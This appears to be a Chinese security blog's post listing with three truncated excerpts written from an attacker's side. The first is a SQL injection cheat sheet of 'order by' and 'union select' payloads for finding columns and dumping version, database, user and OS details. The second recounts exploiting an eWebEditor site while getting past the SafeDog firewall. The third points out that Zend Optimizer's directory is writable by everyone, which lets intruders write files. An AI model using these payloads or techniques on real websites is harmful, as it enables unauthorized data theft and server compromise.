testjun

摘要： 暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() /*and 1=2 union all select user() /*操作系统信息：and 1=2 union all se 阅读全文

摘要： 题目说到了问题和突破，问题的ewebeditor程序，这儿程序问题出来哪儿呢？1.登陆的地方被删除了，也就是admin_login.asp这个页面被删除了。2.是post提交好像有问题，不管点击那个提交post都会跳转到登陆页面，但是登陆页面又没有，如果直接访问那个页面，当然也可以访问。当然上边说到的突破，所谓突破也就是说非常规的环境，非常规的手法去实现同一个目的。下面说一下这个非常规的环境。1.问题ewebeditor2.服务器装有安全狗下面是我测试的过程：首先当然是增加样式，但是常规的post提交失败，于是我想到了想这样的在老程序他一般都是使用request接受数据的，于是乎我下载了源码看 阅读全文

摘要： 服务器上很多都装了 Zend 就算 C:\Program Files\ 设置过权限，安装Zend后，Zend 会自动配置目录的权限 C:\Program Files\Zend\ZendOptimizer-3.3.0\ 下的目录权限为 Everyone 全权,这导致入侵者能写入文件。 阅读全文